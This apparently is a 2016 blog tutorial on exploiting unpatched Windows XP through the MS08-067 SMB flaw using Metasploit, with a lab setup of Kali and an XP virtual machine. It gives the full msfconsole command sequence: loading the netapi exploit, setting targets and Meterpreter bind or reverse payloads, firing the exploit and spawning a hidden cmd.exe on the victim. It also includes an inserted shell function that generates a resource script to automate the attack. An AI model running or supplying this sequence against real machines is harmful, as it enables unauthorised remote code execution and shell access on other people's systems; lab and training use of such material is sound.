Friday, March 18, 2016

HOW TO: WINDOWS XP NETAPI (MS08-067) EXPLOITATION

In this article I will show you how easily a system running Windows XP can be exploited with the MS08-067 netapi exploit, a remote code execution flaw in the Server service that is reached over SMB (TCP port 445).
Before we start: if you wonder what the point of exploiting an old version of Windows is, my answer is that you have to take baby steps before you can run.
LAB SETUP:
-> a Windows XP virtual machine with SP2/SP3 (I used SP2). It must not have the MS08-067 patch (KB958644, October 2008) installed, or the exploit will simply fail.
-> a Kali virtual machine / standalone system
I will leave finding the host on the network and identifying the services it runs to you; what matters for this exploit is that TCP port 445 (SMB) is reachable on the target.
Assume the victim's IP address is 192.168.1.5 and your attacker machine is at 192.168.1.6.
In a terminal on Kali, start Metasploit by running msfconsole (it is on your PATH; the framework itself lives under /usr/share/metasploit-framework). It takes a moment to load.
Now we search for the netapi exploit:
msf>search netapi
You will be shown a number of results, among which you will find:
exploit/windows/smb/ms08_067_netapi
Copy this and use it as follows:
msf>use exploit/windows/smb/ms08_067_netapi
The prompt changes to
msf exploit(ms08_067_netapi)>
to show that the module is loaded.
The exploit is selected; now we need to set its options.
msf exploit(ms08_067_netapi)> show options
The ones that matter are RHOST and RPORT.
Set RHOST (the remote host, i.e. the victim) as follows:
msf exploit(ms08_067_netapi)> set rhost 192.168.1.5
RPORT defaults to 445 (SMB), so it only needs changing if the target serves SMB on another port.
Now our exploit is ready, but we still need a payload: the code that runs on the victim once the exploit succeeds.
The payloads compatible with the selected exploit are listed with
msf exploit(ms08_067_netapi)> show payloads
(search payload also turns up payload modules, but show payloads is restricted to those this exploit can actually carry.)
I have tried both a bind shell and a reverse shell; here we will go with the bind shell.
msf exploit(ms08_067_netapi)> set payload windows/meterpreter/bind_tcp
Just as we set the exploit's options, we need to do the same for the payload.
msf exploit(ms08_067_netapi)> show options
The payload options are LPORT and, for some payloads, LHOST. With a bind payload such as bind_tcp the listener is opened on the victim, so LPORT (4444 by default) is the port the victim will listen on and Metasploit will connect to; LHOST is not an option of a bind payload at all. LHOST, the attacker machine's IP address, is only needed if you pick a reverse payload (for example windows/meterpreter/reverse_tcp), where the victim connects back to you:
msf exploit(ms08_067_netapi)>set lhost 192.168.1.6
Now we are all set. (The module also supports check, which probes the target for the vulnerability without exploiting it.)
msf exploit(ms08_067_netapi)> exploit
If you have followed the steps correctly, you will be presented with a Meterpreter prompt. If the exploit fails instead, the usual causes are a patched target, a firewall blocking port 445, or a wrong target selection (see the note on targets below).
Now, to get a Windows command prompt, run cmd.exe as a hidden (-H), channelized (-c) process:
meterpreter> execute -f cmd.exe -c -H
A channel is created and reported as
'channel 1 created'
Attach to it with
meterpreter> interact 1
and you have the victim's cmd!! (Meterpreter's shell command is a one-step shortcut for the same thing.)
While configuring the exploit you can run show targets to list the OS and service-pack combinations this module has return addresses for. The default target, Automatic Targeting, fingerprints the victim; if that misidentifies it, pick a target explicitly with set target followed by its number.
The exploitation could also have been done with windows/shell_bind_tcp, which gives a plain cmd.exe over the socket, but I went for the Meterpreter payload instead: it runs in memory and gives you file transfer, process migration and much more on top of a shell.
Read about Meterpreter to see why.
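The whole sequence above can be scripted as a Metasploit resource file (.rc) instead of being typed at the msf prompt one line at a time. The following is an added example, not part of the original post: a small POSIX sh function that generates such a resource file for the lab addresses used in this article and encodes the bind-versus-reverse distinction (LHOST is emitted only for reverse payloads, since bind payloads listen on the victim). Port 4444 and the file name ms08.rc are assumptions for illustration.

```sh
#!/bin/sh
# Added example (not from the original post): build a Metasploit resource
# script for exploit/windows/smb/ms08_067_netapi, so the steps typed at the
# msf prompt can be replayed with: msfconsole -q -r ms08.rc
#
# build_rc RHOST PAYLOAD LPORT [LHOST]
#   RHOST   victim address (192.168.1.5 in this article)
#   PAYLOAD e.g. windows/meterpreter/bind_tcp or windows/meterpreter/reverse_tcp
#   LPORT   bind: port the victim opens and msf connects to;
#           reverse: port msf listens on for the victim to connect back
#   LHOST   attacker address, required for reverse payloads only
build_rc() {
    rhost="$1"
    payload="$2"
    lport="$3"
    lhost="${4:-}"

    case "$payload" in
        *reverse_*)
            # The victim connects back to us, so it must know our address.
            if [ -z "$lhost" ]; then
                echo "build_rc: $payload needs LHOST (attacker IP)" >&2
                return 1
            fi
            ;;
        *bind_*)
            # The listener is opened on the victim; LHOST is not an option
            # of a bind payload, so drop anything passed for it.
            if [ -n "$lhost" ]; then
                echo "build_rc: ignoring LHOST for bind payload $payload" >&2
            fi
            lhost=""
            ;;
        *)
            echo "build_rc: unsupported payload: $payload" >&2
            return 1
            ;;
    esac

    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set RHOST %s\n' "$rhost"
    printf 'set RPORT 445\n'
    printf 'set payload %s\n' "$payload"
    printf 'set LPORT %s\n' "$lport"
    if [ -n "$lhost" ]; then
        printf 'set LHOST %s\n' "$lhost"
    fi
    # 'check' probes for the vulnerability without exploiting it; its result
    # does not gate 'exploit' in a resource script, so read its output.
    # 'exploit' then fires with the module's default Automatic Targeting.
    printf 'check\n'
    printf 'exploit\n'
}

# Usage with the assumed lab addresses from the article:
#   build_rc 192.168.1.5 windows/meterpreter/bind_tcp 4444 > ms08.rc
#   msfconsole -q -r ms08.rc
```

Swapping the payload argument for windows/meterpreter/reverse_tcp together with 192.168.1.6 as LHOST produces the reverse-shell variant; passing a reverse payload without LHOST is rejected rather than producing a script that would fail at the msf prompt.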
Here are a few links you may find useful.
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
http://resources.infosecinstitute.com/icmp-reverse-shell/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
